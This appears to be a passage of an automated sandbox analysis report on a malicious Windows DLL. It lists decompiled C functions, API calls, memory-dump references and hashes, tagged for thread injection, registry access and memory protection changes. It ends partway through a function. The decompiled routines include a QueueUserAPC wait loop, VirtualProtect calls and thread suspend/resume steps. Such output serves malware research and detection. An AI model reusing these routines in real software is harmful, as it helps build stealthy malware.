                0x01c13591
                0x01c13598
                0x01c1359e
                0x01c135a3
                0x01c135a9
                0x01c135b0
                0x01c135b2
                0x01c135b4
                0x01c135c3
                0x01c135c9
                0x01c135cb
                0x01c135d0
                0x01c13600
                0x01c13602
                0x01c135d2
                0x01c135d2
                0x01c135d8
                0x01c135e5
                0x01c135eb
                0x01c135eb
                0x01c135f3
                0x01c135fc
                0x01c13603
                0x01c13605
                0x01c13607
                0x01c1360e
                0x01c1361b
                0x01c13620
                0x01c13625
                0x01c13627
                0x01c13629
                0x00000000
                0x00000000
                0x01c1362b
                0x01c13630
                0x01c13632
                0x01c13639
                0x01c1363d
                0x01c13640
                0x01c13655
                0x01c13659
                0x01c1365e
                0x00000000
                0x01c1365e
                0x01c13642
                0x01c13644
                0x00000000
                0x00000000
                0x01c1364f
                0x01c13651
                0x01c13653
                0x00000000
                0x00000000
                0x00000000
                0x01c13653
                0x01c13636
                0x01c13636
                0x01c13607
                0x01c13545
                0x01c13545
                0x01c1354a
                0x01c13660
                0x01c13665
                0x01c1366d
                0x01c1366d
                0x00000000
                0x01c13665
                0x01c13550
                0x01c13553
                0x01c1355d
                0x01c13564
                0x00000000
                0x01c13675
                0x01c13675
                0x01c13678
                0x01c1367c
                0x01c1367c

                APIs
                  • Part of subcall function 01C13B98: GetModuleHandleA.KERNEL32(4C44544E,00000000,01C134BA,00000001), ref: 01C13BA7
                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 01C13537
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • memset.NTDLL ref: 01C13587
                • RtlInitializeCriticalSection.NTDLL(02179570), ref: 01C13598
                  • Part of subcall function 01C11E0F: memset.NTDLL ref: 01C11E29
                  • Part of subcall function 01C11E0F: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 01C11E6F
                  • Part of subcall function 01C11E0F: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 01C11E7A
                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 01C135C3
                • wsprintfA.USER32 ref: 01C135F3
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                • String ID:
                • API String ID: 4246211962-0
                • Opcode ID: 69bb68600374839e1883afd582ab802ad5097c27cd45a15e2f3c5a3950f8635d
                • Instruction ID: a05fea86412ab8f773f7cd28f89cda7ac5c233436c97d9eb2d0fcd78982a5e96
                • Opcode Fuzzy Hash: 69bb68600374839e1883afd582ab802ad5097c27cd45a15e2f3c5a3950f8635d
                • Instruction Fuzzy Hash: 42510B71BC12A5EBDB21DBA8DC85F6D37B8BB17B28F100825E206D724DD7B4D640AB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C1284F Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                Download Yara Rule
                C-Code - Quality: 22%
                			E01C1284F(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E01C12114(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E01C12C11(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E01C12114((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x1c1a2d0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                0x01c12856
                0x01c1285d
                0x01c12862
                0x01c12865
                0x01c1286c
                0x01c1286f
                0x01c12872
                0x01c12879
                0x01c1287c
                0x01c129d0
                0x01c129d2
                0x01c129d4
                0x01c129d9
                0x01c129d9
                0x01c12882
                0x01c12885
                0x01c12888
                0x01c1288a
                0x01c1288a
                0x01c1288e
                0x00000000
                0x00000000
                0x01c12892
                0x01c128be
                0x01c128c3
                0x01c128c5
                0x01c128c5
                0x01c128c8
                0x01c128cb
                0x01c128cb
                0x01c128cd
                0x00000000
                0x01c12898
                0x01c1289a
                0x01c128b9
                0x01c128b9
                0x01c128d0
                0x01c128d0
                0x01c128d1
                0x01c128d1
                0x01c128d4
                0x00000000
                0x00000000
                0x00000000
                0x01c128d4
                0x01c1289e
                0x01c128e5
                0x01c128e9
                0x01c129c3
                0x01c129c5
                0x01c129c5
                0x01c129c6
                0x01c129c9
                0x00000000
                0x01c129c9
                0x01c128f2
                0x01c12903
                0x01c12907
                0x01c129bf
                0x00000000
                0x01c129bf
                0x01c1290d
                0x01c12910
                0x01c12914
                0x01c1291a
                0x01c1291d
                0x01c129b5
                0x01c129b5
                0x00000000
                0x01c129bb
                0x01c12928
                0x01c12931
                0x01c12945
                0x01c1294c
                0x01c12961
                0x01c12967
                0x01c1296f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x01c12971
                0x01c12971
                0x01c12971
                0x01c12978
                0x01c12980
                0x00000000
                0x00000000
                0x01c12982
                0x01c1298b
                0x00000000
                0x00000000
                0x00000000
                0x01c1298d
                0x01c1298f
                0x01c12992
                0x01c12992
                0x01c12995
                0x01c12999
                0x01c1299c
                0x01c129a2
                0x01c129a5
                0x01c129ac
                0x00000000
                0x01c12928
                0x01c128a3
                0x01c128ae
                0x01c128b1
                0x01c128b3
                0x01c128b3
                0x01c128b6
                0x01c128b8
                0x00000000
                0x01c128b8
                0x01c12892
                0x01c128d8
                0x01c128dd
                0x01c128df
                0x01c128df
                0x01c128e2
                0x01c128e2
                0x00000000

                APIs
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 01C1294C
                • lstrcat.KERNEL32(69B25F45,00000020), ref: 01C12961
                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 01C12978
                • lstrlen.KERNEL32(69B25F45), ref: 01C1299C
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                • String ID:
                • API String ID: 3214092121-3916222277
                • Opcode ID: 803bdc3012622071cc27cef3f57af368c5d5a5d33b3dac701aff7a1bc9f79a7d
                • Instruction ID: b65beb8813de8e465ecee50882348333d7b99a8ee51c48bbc845b64c4c5209fa
                • Opcode Fuzzy Hash: 803bdc3012622071cc27cef3f57af368c5d5a5d33b3dac701aff7a1bc9f79a7d
                • Instruction Fuzzy Hash: BC51CF3AA80108EFEB21CF9DC4446ADBBB6FF56350F24805AE9459B209C730DB51EB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C157E8 Relevance: 7.6, APIs: 5, Instructions: 95synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C157E8(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x1c1a2c8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x1c1a2d8; // 0x55d5a8
				_t3 = _t8 + 0x1c1b876; // 0x61636f4c
				_t25 = 0;
				_t30 = E01C13FEB(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x1c1a304, 1, 0, _t30);
					E01C12C11(_t30);
				}
				_t12 =  *0x1c1a2b4; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E01C11212(_t32, _t26); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E01C12130(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E01C16096(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}


















                0x01c157e9
                0x01c157f0
                0x01c157fa
                0x01c157fe
                0x01c15804
                0x01c15813
                0x01c1581a
                0x01c1581e
                0x01c15830
                0x01c15832
                0x01c15832
                0x01c15837
                0x01c1583e
                0x01c15893
                0x01c15893
                0x01c15899
                0x01c1589b
                0x01c1589b
                0x01c158a0
                0x01c158a5
                0x01c158a9
                0x01c158bb
                0x01c158bb
                0x01c158bf
                0x01c158c5
                0x01c158c5
                0x00000000
                0x01c1584e
                0x01c1584e
                0x01c15855
                0x00000000
                0x00000000
                0x01c1585c
                0x01c15864
                0x01c15866
                0x01c1586a
                0x01c1586a
                0x01c15872
                0x01c15877
                0x01c1587b
                0x01c1587f
                0x01c158d4
                0x01c158da
                0x01c158da
                0x01c1588d
                0x01c15891
                0x01c158c8
                0x01c158ca
                0x01c158cd
                0x01c158cd
                0x00000000
                0x01c158ca
                0x01c15891
                0x00000000
                0x01c1587b

                APIs
                  • Part of subcall function 01C13FEB: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,02179B30,00000000,?,?,69B25F44,00000005,01C1A010,4D283A53,?,?), ref: 01C14021
                  • Part of subcall function 01C13FEB: lstrcpy.KERNEL32(00000000,00000000), ref: 01C14045
                  • Part of subcall function 01C13FEB: lstrcat.KERNEL32(00000000,00000000), ref: 01C1404D
                • CreateEventA.KERNEL32(01C1A304,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,01C161CB,?,?,?), ref: 01C15829
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                • StrChrW.SHLWAPI(01C161CB,00000020,61636F4C,00000001,00000000,?,?,00000000,?,01C161CB,?,?,?), ref: 01C1585C
                • WaitForSingleObject.KERNEL32(00000000,00004E20,01C161CB,00000000,00000000,?,00000000,?,01C161CB,?,?,?), ref: 01C15887
                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,01C161CB,?,?,?), ref: 01C158B5
                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,01C161CB,?,?,?), ref: 01C158CD
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 73268831-0
                • Opcode ID: 33d58eabe9a1c7c44eaee6489de14dc88fb9d5280dcac66ec459db7b12b76872
                • Instruction ID: afe8322ac43db31ab9b9efd7c441bc424fe8eff69d9c4e42372e11646c4e38d1
                • Opcode Fuzzy Hash: 33d58eabe9a1c7c44eaee6489de14dc88fb9d5280dcac66ec459db7b12b76872
                • Instruction Fuzzy Hash: F32125329C1311EBF7315AAC9884BAB77A9FBDBA20B150225FE469714CDB71CA01A750
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CBC31 Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046CD0E6: RegCreateKeyA.ADVAPI32(80000001,04C9B7F0,?), ref: 046CD0FB
                  • Part of subcall function 046CD0E6: lstrlen.KERNEL32(04C9B7F0,00000000,00000000,046ED06E,?,?,?,046C902F,00000001,?), ref: 046CD124
                • RegQueryValueExA.KERNELBASE(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,00000003,00000000,?,00000000,?,046DE5BD,046DE5BD,?,046D6019,00000000), ref: 046CBC69
                • RtlAllocateHeap.NTDLL(00000000,046D6019), ref: 046CBC7D
                • RegQueryValueExA.ADVAPI32(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046CBC97
                • HeapFree.KERNEL32(00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?), ref: 046CBCB3
                • RegCloseKey.ADVAPI32(?,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046CBCC1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                • String ID:
                • API String ID: 1633053242-0
                • Opcode ID: 41b27e586e5a7220d49eeb516c3c563c2d41b1cb641889aea04d298992fb6c12
                • Instruction ID: 56d4f1cc300437dde402fda793c6e6702037271f5ad14fc396f6e007b1531027
                • Opcode Fuzzy Hash: 41b27e586e5a7220d49eeb516c3c563c2d41b1cb641889aea04d298992fb6c12
                • Instruction Fuzzy Hash: 411130B250010DFFDB019F95ED85CBE7BBEFB88654B10042AF91197210FB72AD559B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C12F14 Relevance: 7.5, APIs: 5, Instructions: 49threadinjectionCOMMON
                Download Yara Rule
                C-Code - Quality: 49%
                			E01C12F14(void* __ecx, void* __edi, intOrPtr _a4) {
				unsigned int _v8;
				void* _v12;
				long _t15;
				long _t16;
				signed int _t18;
				signed int _t19;
				unsigned int _t21;
				unsigned int _t26;

				asm("stosd");
				_v12 = _v12 | 0xffffffff;
				while(1) {
					_t15 = QueueUserAPC(E01C12702, GetCurrentThread(),  &_v12); // executed
					if(_t15 == 0) {
						break;
					}
					_t26 = _v8;
					_t18 = (_t26 << 0x00000020 | _v12) >> 5;
					_push(0);
					_push(0x13);
					_push(_t26 >> 5);
					_push(_t18);
					L01C181DA();
					_push(1);
					_t19 = 3;
					_t21 = SleepEx(_t19 << (_t18 & 0x00000007), ??); // executed
					_t16 = E01C16F25(_a4, (_t21 >> 6) + _t18);
					if(_t16 == 1) {
						continue;
					} else {
					}
					L5:
					return _t16;
				}
				_t16 = GetLastError();
				goto L5;
			}











                0x01c12f1f
                0x01c12f20
                0x01c12f26
                0x01c12f36
                0x01c12f3e
                0x00000000
                0x00000000
                0x01c12f43
                0x01c12f46
                0x01c12f4a
                0x01c12f4c
                0x01c12f51
                0x01c12f52
                0x01c12f53
                0x01c12f5a
                0x01c12f60
                0x01c12f67
                0x01c12f76
                0x01c12f7e
                0x00000000
                0x00000000
                0x01c12f80
                0x01c12f88
                0x01c12f8a
                0x01c12f8a
                0x01c12f82
                0x00000000

                APIs
                • GetCurrentThread.KERNEL32 ref: 01C12F2A
                • QueueUserAPC.KERNELBASE(01C12702,00000000,?,?,?,01C16D70,?,?), ref: 01C12F36
                • _aullrem.NTDLL(000000FF,?,00000013,00000000), ref: 01C12F53
                • SleepEx.KERNELBASE(00000003,00000001,?,?,?,01C16D70,?,?), ref: 01C12F67
                  • Part of subcall function 01C16F25: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,00000000), ref: 01C16F84
                • GetLastError.KERNEL32(?,?,?,01C16D70,?,?), ref: 01C12F82
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: CurrentErrorLastQueueSleepThreadUser_aullremmemcpy
                • String ID:
                • API String ID: 2952296216-0
                • Opcode ID: 2c907d48f93258317095e09a7c81b0b90aa25834bd426a3c38d0ff7ec633260a
                • Instruction ID: 1116bb24f7c2cbfe486e1a53c256d536ba442583cca80aa5268d0f6f3295e348
                • Opcode Fuzzy Hash: 2c907d48f93258317095e09a7c81b0b90aa25834bd426a3c38d0ff7ec633260a
                • Instruction Fuzzy Hash: 9D0167B6A80214FBEB249AA5DC1EFEE7A7CE756710F100118F503D6184D6B0D741D761
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D7254 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6), ref: 046D7279
                • GetLastError.KERNEL32(?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046D7281
                • VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F), ref: 046D7298
                • VirtualProtect.KERNEL32(?,00000000,-2C9B417C,00000004,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7), ref: 046D72BD
                • SetLastError.KERNEL32(00000000,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046D72C6
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Virtual$ErrorLastProtect$Query
                • String ID:
                • API String ID: 148356745-0
                • Opcode ID: af9ce6a6d5a52a517756a14bfc19e5867ad700c449fda97c764542f42f77a465
                • Instruction ID: dfa36bf0b317ce24806d57137eb39f3b12be813ff9f694c568361aa8db3549a6
                • Opcode Fuzzy Hash: af9ce6a6d5a52a517756a14bfc19e5867ad700c449fda97c764542f42f77a465
                • Instruction Fuzzy Hash: BE01257290020AEF9B11AF96DC44CEABBB9EB582517008426F901D7220E775EA149BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C15CF6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C15CF6(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E01C13B1B(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x1c1a2d8; // 0x55d5a8
				_t4 = _t24 + 0x1c1be38; // 0x21793e0
				_t5 = _t24 + 0x1c1bde0; // 0x4f0053
				_t26 = E01C171E5( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x1c1a2d8; // 0x55d5a8
						_t11 = _t32 + 0x1c1be2c; // 0x21793d4
						_t48 = _t11;
						_t12 = _t32 + 0x1c1bde0; // 0x4f0053
						_t52 = E01C16C7B(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x1c1a2d8; // 0x55d5a8
							_t13 = _t35 + 0x1c1be76; // 0x30314549
							if(E01C136C5(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x1c1a2b4 - 6;
								if( *0x1c1a2b4 <= 6) {
									_t42 =  *0x1c1a2d8; // 0x55d5a8
									_t15 = _t42 + 0x1c1bdc2; // 0x52384549
									E01C136C5(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x1c1a2d8; // 0x55d5a8
							_t17 = _t38 + 0x1c1be70; // 0x2179418
							_t18 = _t38 + 0x1c1be48; // 0x680043
							_t45 = E01C12BC9(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x1c1a290, 0, _t52);
						}
					}
					HeapFree( *0x1c1a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E01C173B2(_t54);
				}
				return _t45;
			}


















                0x01c15cf6
                0x01c15d06
                0x01c15d09
                0x01c15d10
                0x01c15d12
                0x01c15d12
                0x01c15d15
                0x01c15d1a
                0x01c15d21
                0x01c15d2e
                0x01c15d33
                0x01c15d37
                0x01c15d45
                0x01c15d53
                0x01c15d57
                0x01c15de8
                0x01c15de8
                0x01c15d5d
                0x01c15d5d
                0x01c15d62
                0x01c15d62
                0x01c15d69
                0x01c15d75
                0x01c15d77
                0x01c15d79
                0x01c15d7b
                0x01c15d82
                0x01c15d94
                0x01c15d96
                0x01c15d9d
                0x01c15d9f
                0x01c15da6
                0x01c15db1
                0x01c15db1
                0x01c15d9d
                0x01c15db6
                0x01c15dbb
                0x01c15dc2
                0x01c15de0
                0x01c15de2
                0x01c15de2
                0x01c15d79
                0x01c15df4
                0x01c15df4
                0x01c15df6
                0x01c15dfb
                0x01c15dfd
                0x01c15dfd
                0x01c15e08

                APIs
                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,021793E0,00000000,?,74E5F710,00000000,74E5F730), ref: 01C15D45
                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02179418,?,00000000,30314549,00000014,004F0053,021793D4), ref: 01C15DE2
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01C154C0), ref: 01C15DF4
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Ut
                • API String ID: 3298025750-8415677
                • Opcode ID: a773dae8cbc81837727b0acc54b48e9f23ebf3c3c08b432ef5eb1785c633e782
                • Instruction ID: d010f7dddb6417d4b3637eebff4951862e289a6559907fbf0666ec5e12b2e945
                • Opcode Fuzzy Hash: a773dae8cbc81837727b0acc54b48e9f23ebf3c3c08b432ef5eb1785c633e782
                • Instruction Fuzzy Hash: C831CF31A80159EFDB21EFA4DD88FDA7BB8FB4B700F140055E60997129DB71DA08EB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DB084 Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 046DB0B2
                • ResumeThread.KERNELBASE(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 046DB13C
                • WaitForSingleObject.KERNEL32(00000064), ref: 046DB14A
                • SuspendThread.KERNELBASE(?), ref: 046DB15D
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                • String ID:
                • API String ID: 3168247402-0
                • Opcode ID: 55903e9fdb585463173161cf820b691265bd861509bda58fa957d84eba61964f
                • Instruction ID: 73ed20f9f84827d8886854fabba92b823385db84debcde82c0ab70b7d412ec0a
                • Opcode Fuzzy Hash: 55903e9fdb585463173161cf820b691265bd861509bda58fa957d84eba61964f
                • Instruction Fuzzy Hash: 4F415871104301AFE721EF54CC80E7BBBE9EF98754F00492DFA95922A4E731F9588B66
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C12711 Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 61%
                			E01C12711(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				void* _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
